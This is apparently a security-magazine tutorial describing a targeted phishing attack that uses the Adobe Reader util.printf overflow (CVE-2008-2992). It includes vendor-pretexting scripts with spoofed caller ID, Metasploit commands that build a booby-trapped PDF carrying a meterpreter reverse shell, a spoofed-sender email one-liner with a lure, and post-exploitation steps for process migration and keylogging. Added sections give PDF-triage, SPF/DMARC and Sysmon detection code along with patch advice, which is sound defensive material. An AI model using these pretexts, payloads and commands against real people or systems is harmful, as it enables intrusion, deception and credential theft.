I hacked your computer

With every passing day, with each new piece of software, hackers around the world start looking for vulnerabilities and write exploit code for them. Patching those vulnerabilities takes time, and by then systems have already been compromised. As an attacker there are many ways to compromise client-side systems; my preferred method involves social engineering.

Imagine you receive a PDF attachment from a friend or a colleague. You open it and get an Adobe Reader error saying it is not able to open the PDF because the file may be damaged or not created properly. Your first thought is that the source may not be good, so you run it through your antivirus, which reports the file as clean; this gives you a feeling of safety. You click OK and continue with your tasks, asking IT for help or trying something else. You didn't realize that you just got owned!

In a traditional scenario, an attacker would go dumpster diving for emails and other printouts to get some information about you. I feel there are better ways to get such information, and that is where the art of social engineering comes in. Many times I have used social engineering techniques to prove that anything can be done if you know how to talk your way through it. In our scenario the attacker has been doing a lot of information gathering, using tools such as the Metasploit Framework, Maltego and others to collect email addresses and the other details needed to launch a client-side social engineering attack on the victim.

Scenario
For our demonstration we will talk about how the social engineering is done to extract the required information. First we choose a victim, then we go to their website and search the careers section for the available IT jobs at the company. The vacant positions and their individual descriptions tell us which software technologies are in use.

With that brief idea, we can then search the major vendors' websites for their testimonials or client lists. Every vendor proudly displays its client list on its website to show credibility and to have major organizations vouch for the quality of its work.

Then we call these vendors posing as a large organization, with our caller ID spoofed to match, and ask them about the victim company: we have worked with them before, we like the products you sold them, and we would like the same products for ourselves. Alternatively, we say that we have seen their client list but are not sure we can trust them because they are new to this region. Either way, we have the vendor give us the email address of their IT contact inside the company, so we can ask that person directly about the vendor's claims of excellent service. Most vendors will oblige, thinking it will be good for their business. The higher the owner of that mail id sits in the victim's hierarchy, the better it is for the attacker.

After a successful social engineering session and scraping the web for email addresses, you have gained two key pieces of information:

They use XYZ Computers for technical services. The IT Dept has an email address of [email protected]

Vulnerability Description
A remote overflow exists in Adobe Reader and Adobe Acrobat. The document reader fails to properly bounds check input to the util.printf() JavaScript function, resulting in a stack-based overflow. With a specially crafted document, an attacker can cause arbitrary code execution resulting in a loss of integrity.

Classification
Location: Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Exploit Public, Exploit Commercial
Disclosure: OSVDB Verified, Vendor Verified

Listing 1. Creating malicious PDF file

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME XYZComputers-UpgradeInstructions.pdf
FILENAME => XYZComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST
LHOST =>
msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT => 4455
msf exploit(adobe_utilprintf) > show options

Module options:

   Name        Current Setting                             Required  Description
   ----        ---------------                             --------  -----------
   FILENAME    XYZComputers-UpgradeInstructions.pdf        yes       The file name.
   OUTPUTPATH  /pentest/exploits/framework3/data/exploits  yes       The location of the file.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4455             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)

Listing 2. PDF file created

msf exploit(adobe_utilprintf) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Creating 'XYZComputers-UpgradeInstructions.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/XYZComputers-UpgradeInstructions.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_utilprintf) >


Now what?
We want to gain a shell on the IT Department's computer and run a key logger to collect passwords, intel about confidential systems in use, or any other juicy tidbits of information we can get our hands on.

We start off by loading the Metasploit Framework's msfconsole.

Once it is loaded we want to create a malicious PDF that will give the victim a sense of security in opening it. To do that it must appear legitimate, have a realistic title, and not be flagged by anti-virus or other security software. We are going to use the Adobe Reader util.printf() JavaScript Function Stack Buffer Overflow Vulnerability.

Listing 3. Setting up multi handler listener

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4455
LPORT => 4455
msf exploit(handler) > set LHOST
LHOST =>
msf exploit(handler) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Starting the payload handler...

Listing 4. Creating hacking e-mail

root@bt:~# sendEmail -t [email protected] -f [email protected] -s -u "Important Upgrade Instructions" -a /tmp/XYZComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading
and securing your software. Please read and let us know if you have any problems.

XYZ Computers Tech Support

Aug 24 17:32:51 bt sendEmail[13144]: Message input complete.
Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully!

Listing 5. What displays on the attacker's machine screen...

[*] Handler binding to LHOST
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened ( -> )
meterpreter >


Adobe Reader is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application, or crash the application, denying service to legitimate users.
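The antivirus scan in Figure 1 passes the file, which is the normal outcome for a document exploit: signature AV keys on known payloads, not on the structure that makes the attack work. What a defender can do instead is triage a suspicious PDF statically for the markers this attack needs: an action that fires on open (/OpenAction or /AA), a JavaScript action, and a util.printf() call with an absurd field width. The following is an added example, not code from this article or from the Metasploit module; the PDFs it scans are constructed inside the script, the `%45000f` trigger string is used only as the shape of the public crash (no shellcode, nothing is executed), and the hex-escaped `/J#61vaScript` name is included to show why a naive grep for "JavaScript" is not enough.

```python
"""Static triage of a PDF for the markers of a JavaScript-driven exploit
such as the util.printf() overflow.  Added example; nothing here renders
or executes the document."""
import re
import zlib

# What an exploit PDF needs: something that fires on open and a JavaScript
# action.  /Launch is a related abuse worth flagging for manual review.
SUSPICIOUS_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch")
# PDF names may hide keywords with #xx hex escapes, e.g. /J#61vaScript.
_NAME_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# util.printf("%45000f", ...): a width of four or more digits has no
# legitimate use and is the signature of the overflow trigger.
_PRINTF = re.compile(rb"util\.printf\s*\(\s*['\"][^'\"]*%0?\d{4,}", re.IGNORECASE)


def _inflate_streams(data: bytes) -> bytes:
    """Return data plus the inflated body of every FlateDecode stream, so
    keywords inside compressed objects are visible to the regexes."""
    inflated = []
    for m in _STREAM.finditer(data):
        try:
            # decompressobj tolerates a stream whose trailing bytes were
            # eaten by the line-ending match above; zlib.decompress would not.
            inflated.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue  # not zlib data (images, other filters)
    return data + b"\n" + b"\n".join(inflated)


def triage_pdf(data: bytes) -> dict:
    """Count suspicious names, check for an overlong util.printf width and
    return a verdict: clean / review / suspicious / malicious."""
    text = _NAME_ESC.sub(lambda m: bytes([int(m.group(1), 16)]),
                         _inflate_streams(data))
    findings = {n.decode(): text.count(n) for n in SUSPICIOUS_NAMES if n in text}
    findings["util.printf_overlong_width"] = bool(_PRINTF.search(text))
    has_js = "/JavaScript" in findings or "/JS" in findings
    auto_run = "/OpenAction" in findings or "/AA" in findings
    if findings["util.printf_overlong_width"]:
        findings["verdict"] = "malicious"
    elif has_js and auto_run:
        findings["verdict"] = "suspicious"   # script runs without a click
    elif has_js or "/Launch" in findings:
        findings["verdict"] = "review"
    else:
        findings["verdict"] = "clean"
    return findings


def build_sample_pdf(js: bytes = b"") -> bytes:
    """Constructed sample: a minimal one-page PDF.  With js given, the
    catalog's /OpenAction runs it from a FlateDecode stream and the action's
    /S name is hex-escaped, mimicking an obfuscated exploit document."""
    objs = [b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b"<< /Type /Page /Parent 2 0 R >>"]
    if not js:
        catalog = b"<< /Type /Catalog /Pages 2 0 R >>"
    else:
        catalog = b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>"
        body = zlib.compress(js)
        objs += [b"<< /Type /Action /S /J#61vaScript /JS 5 0 R >>",
                 b"<< /Length %d /Filter /FlateDecode >>\nstream\n%s\nendstream"
                 % (len(body), body)]
    out = b"%PDF-1.4\n1 0 obj\n" + catalog + b"\nendobj\n"
    for i, obj in enumerate(objs, start=2):
        out += b"%d 0 obj\n%s\nendobj\n" % (i, obj)
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed trigger in the shape of the public util.printf() crash:
# a format string whose field width overruns the stack buffer.
EXPLOIT_JS = b'var num = 1.2; util.printf("%45000f", num);'

if __name__ == "__main__":
    for label, pdf in (("exploit-shaped", build_sample_pdf(EXPLOIT_JS)),
                       ("benign", build_sample_pdf())):
        print(label, triage_pdf(pdf))
```

Run it on a real attachment with `triage_pdf(open(path, "rb").read())`. Any hit other than "clean" on a file that arrived unsolicited by email deserves a detonation in an isolated VM before a user opens it, regardless of what the AV scan said.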

So we start by creating our malicious PDF file for use in this client-side attack (Listing 1).

Once we have all the options set the way we want, we run exploit to create our malicious file (Listing 2).

We can see that our PDF file was created under the module's OUTPUTPATH, a sub-directory of the framework install. So let's copy it to our /tmp directory so it is easier to locate later on when we send it.

Listing 6. Further exploiting

meterpreter > ps

Process list
============

 PID   Name            Path
 ---   ----            ----
 852   taskeng.exe     C:\Windows\system32\taskeng.exe
 1308  Dwm.exe         C:\Windows\system32\Dwm.exe
 2184  VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 2196  VMwareUser.exe  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 3176  iexplore.exe    C:\Program Files\Internet Explorer\iexplore.exe
 3452  AcroRd32.exe    C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe

meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter > sysinfo
Computer: OFFSEC-PC
OS      : Windows Vista (Build 6000, ).
meterpreter > use priv
Loading extension priv...success.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
[*] Recording keystrokes...

root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
Keystroke log started at Wed Mar 23 09:18:36 -0600 2011
Support, I tried to open this file 2-3 times with no success. I even had my admin and CFO try it, but no
one can get it to open. I turned on the remote access server so you can log in to fix our problem. Our user name
is admin and password for that session is 123456. Call me when you are done. Thanks IT Dept


Before we send the malicious file to our victim we need to set up a listener to capture the reverse connection. We use msfconsole to set up the multi/handler listener (Listing 3). The PAYLOAD, LHOST and LPORT must match what was baked into the PDF in Listing 1: the stager inside the PDF connects back to exactly that address and port, and nothing else will answer it.

Now that our listener is waiting for its payload, we have to deliver it to the victim. Since our information gathering produced the email address of the IT Department, we use a handy little script called sendEmail for delivery. With a one-liner we can attach the malicious PDF, use any SMTP server we want and write a convincing email from any address we want (Listing 4).

As we can see, the script lets us set any FROM (-f) address, any TO (-t) address and any SMTP (-s) server, as well as the subject (-u) and our malicious attachment (-a). Once we have done all that and pressed Enter, we type the message body, then press CTRL+D and the email goes out to the victim.
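The "any address we want" in the -f option is exactly what SPF and DMARC exist to catch: the receiving mail server checks whether the connecting IP is allowed to send for the envelope sender's domain, and DMARC then checks that the visible From header is aligned with that domain. The following is an added example, not from the article or from sendEmail: a minimal SPF evaluator (ip4, ip6 and all only; mechanisms that need DNS are reported rather than resolved) and a DMARC-style alignment check, run against records, domains and IP addresses that are all constructed for the example.

```python
"""Why a spoofed -f sender is cheap to send and cheap to catch.  Added
example: an offline SPF evaluator plus DMARC alignment; every domain,
address and record below is constructed for illustration."""
import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
NEEDS_DNS = {"a", "mx", "include", "exists", "ptr"}


def spf_check(client_ip: str, record: str) -> str:
    """Evaluate the sending host's IP against one SPF TXT record.
    Returns pass/fail/softfail/neutral/none/permerror, or
    'unsupported:<mechanism>' when a DNS lookup would be required."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"                      # no policy published for the domain
    ip = ipaddress.ip_address(client_ip)
    for term in terms[1:]:
        if "=" in term.split(":", 1)[0]:   # modifier such as redirect= or exp=
            if term.lower().startswith("redirect="):
                return "unsupported:redirect"
            continue                       # exp= and unknown modifiers are ignored
        qual = "+"
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.split("/", 1)[0].lower()
        if mech in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            if net.version == ip.version and ip in net:
                return QUALIFIERS[qual]    # first matching mechanism wins
        elif mech == "all":
            return QUALIFIERS[qual]
        elif mech in NEEDS_DNS:
            return "unsupported:" + mech
        else:
            return "permerror"
    return "neutral"                       # nothing matched and no 'all'


def receiver_verdict(client_ip: str, mail_from: str, header_from: str,
                     spf_records: dict) -> dict:
    """Simulate the receiving MTA: SPF on the envelope sender (sendEmail's -f
    sets both the envelope and the header From), then DMARC alignment of the
    header From domain with the SPF-authenticated domain.  spf_records maps
    domain -> TXT record and stands in for the DNS lookup."""
    env_domain = mail_from.rsplit("@", 1)[-1].lower()
    hdr_domain = header_from.rsplit("@", 1)[-1].lower()
    spf = spf_check(client_ip, spf_records.get(env_domain, ""))
    aligned = env_domain == hdr_domain
    return {"spf": spf, "aligned": aligned,
            "dmarc": "pass" if spf == "pass" and aligned else "fail"}


# Constructed: the vendor's real mail servers sit in 203.0.113.0/24 and
# 2001:db8:1::/48; the attacker relays from 192.0.2.10 through an SMTP
# server of his choosing, which that record does not cover.
SPF_RECORDS = {
    "xyzcomputers.example": "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8:1::/48 -all",
    "victim.example": "v=spf1 include:_spf.mailhost.example ~all",
}

if __name__ == "__main__":
    spoofed = receiver_verdict("192.0.2.10", "techsupport@xyzcomputers.example",
                               "techsupport@xyzcomputers.example", SPF_RECORDS)
    genuine = receiver_verdict("203.0.113.25", "techsupport@xyzcomputers.example",
                               "techsupport@xyzcomputers.example", SPF_RECORDS)
    print("spoofed:", spoofed)
    print("genuine:", genuine)
```

What the receiver does with a DMARC failure depends on the policy the spoofed domain publishes: with p=none the message is delivered and only reported, with p=quarantine it lands in spam, and with p=reject it is dropped. A vendor domain with no SPF record at all returns "none" above, and the spoof goes straight through, which is why the attacker's reconnaissance of the vendor matters as much as the exploit.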

Now, on the victim's machine, our IT Department employee is getting in for the day and logging in to his computer to check his email.

He sees the very important document and copies it to his desktop, as he always does, so he can scan it with his favourite anti-virus program (Figure 1).

As we can see, it passes with flying colors, so our IT admin is willing to open the file to quickly implement these very important upgrades. Clicking the file opens Adobe Reader but shows a greyed-out window that never reveals a PDF (Figure 2). And then, on the attacker's machine, this is what is revealed (Listing 5).

We now have a shell on their computer through a malicious PDF client-side attack. What is wise at this point is to move the shell into a different process, so that when they kill Adobe Reader we don't lose the session. Then we obtain system info, start a key logger and continue exploiting the network (Listing 6).
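From the defender's side, the two steps just described leave distinctive traces: Adobe Reader, a document viewer, opens an outbound TCP connection to an unusual port (the reverse_tcp stager calling home to LPORT 4455), and then the same Reader process creates a thread inside explorer.exe (what migrate looks like from the outside). The following is an added example, not from the article or from Metasploit: a few Sysmon-style events (field names follow Sysmon's network-connection and CreateRemoteThread events, but the events themselves are constructed here with the process names, PIDs and port from the listings) run through two rules and a correlation step.

```python
"""Detection logic for the foothold in Listings 5 and 6: a document reader
calling home on a non-web port, a document reader injecting into another
process, and the two together from the same PID.  Added example; the event
list is constructed to mirror the article's scenario."""
from collections import defaultdict

READERS = {"acrord32.exe", "acrobat.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
WEB_PORTS = {80, 443}          # Reader legitimately talks to update servers here


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return a list of alert dicts (rule, pid, reason).  A PID that trips
    both the network rule and the injection rule gets a correlated alert:
    a reader that both calls home and injects is a live session, not a
    misconfigured update check."""
    alerts = []
    hits = defaultdict(set)
    for ev in events:
        eid = ev["EventID"]
        if eid == 3 and ev.get("Initiated", True):           # network connection
            image = _basename(ev["Image"])
            if image in READERS and ev["DestinationPort"] not in WEB_PORTS:
                alerts.append({"rule": "reader_outbound_nonweb", "pid": ev["ProcessId"],
                               "reason": f"{image} connected to "
                                         f"{ev['DestinationIp']}:{ev['DestinationPort']}"})
                hits[ev["ProcessId"]].add("net")
        elif eid == 8:                                        # CreateRemoteThread
            src = _basename(ev["SourceImage"])
            if src in READERS:
                alerts.append({"rule": "reader_remote_thread", "pid": ev["SourceProcessId"],
                               "reason": f"{src} created a thread in "
                                         f"{_basename(ev['TargetImage'])} "
                                         f"(pid {ev['TargetProcessId']})"})
                hits[ev["SourceProcessId"]].add("inject")
    for pid, kinds in hits.items():
        if {"net", "inject"} <= kinds:
            alerts.append({"rule": "reverse_shell_then_migrate", "pid": pid,
                           "reason": "same reader process called home and then "
                                     "injected into another process"})
    return alerts


# Constructed events.  PIDs and images follow the ps output in Listing 6;
# 192.0.2.10:4455 stands in for the attacker's LHOST:LPORT.
ACRORD = r"C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe"
EXPLORER = r"C:\Windows\explorer.exe"
IEXPLORE = r"C:\Program Files\Internet Explorer\iexplore.exe"
EVENTS = [
    {"EventID": 1, "ProcessId": 3452, "Image": ACRORD, "ParentImage": EXPLORER,
     "CommandLine": f'"{ACRORD}" "C:\\Users\\itdept\\Desktop\\XYZComputers-UpgradeInstructions.pdf"'},
    {"EventID": 3, "ProcessId": 3452, "Image": ACRORD, "Initiated": True,
     "DestinationIp": "192.0.2.10", "DestinationPort": 4455},          # stager calls home
    {"EventID": 8, "SourceProcessId": 3452, "SourceImage": ACRORD,
     "TargetProcessId": 816, "TargetImage": EXPLORER},                  # migrate
    {"EventID": 3, "ProcessId": 3176, "Image": IEXPLORE, "Initiated": True,
     "DestinationIp": "198.51.100.9", "DestinationPort": 443},          # benign browsing
    {"EventID": 3, "ProcessId": 3452, "Image": ACRORD, "Initiated": True,
     "DestinationIp": "198.51.100.40", "DestinationPort": 443},         # benign update check
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The port rule on its own is weak: nothing stops the attacker from setting LPORT to 443, and the rule would then stay silent. The injection rule does not depend on the port, and the correlation of the two on one PID is what turns a noisy signal into a confident one. The keylogger started in Listing 6 runs inside the migrated process and leaves no comparable event, which is one more reason to act on the first two before the admin types the password that appears in the loot file.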

Conclusion
And that's it; it is game over for the victim. The attacker can now not only get hold of sensitive information but also copy any data from the victim's computer. This vulnerability (CVE-2008-2992) affects Adobe Acrobat and Reader 8.1.2 and earlier and allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument.

Solution
Upgrade to version 8.1.3 or higher, which is reported to fix this vulnerability. An upgrade is required, as no official workaround is published; that said, the exploit can only run if Acrobat JavaScript is enabled, so turning it off in Reader's preferences limits exposure until the upgrade is applied. If a machine has already opened such a file, assume the whole session is compromised (the attacker has migrated out of the Reader process, as in Listing 6): rotate every credential typed on it and, in a really bad case, reinstall the OS.

    Figure 1. PDF Virus Check

    Figure 2. Adobe Reader not able to open

MILIND BHARGAVA
Milind Bhargava, (CEH), (ECSA) is in love with the field of Information Security. In pursuit of his love he completed his CEH & ECSA certifications in 2010 from EC-Council and completed the IT Security & Ethical Hacking course from Appin Noida, India. He has worked as Head of IT for an Oil & Gas MNC in Doha, Qatar, where his responsibilities included but were not limited to Network Security. He believes that ethical hacking is an addiction which you can never master. It's a skill which you can control, but never stop learning more about. And so he continues on his quest as an eternal student.

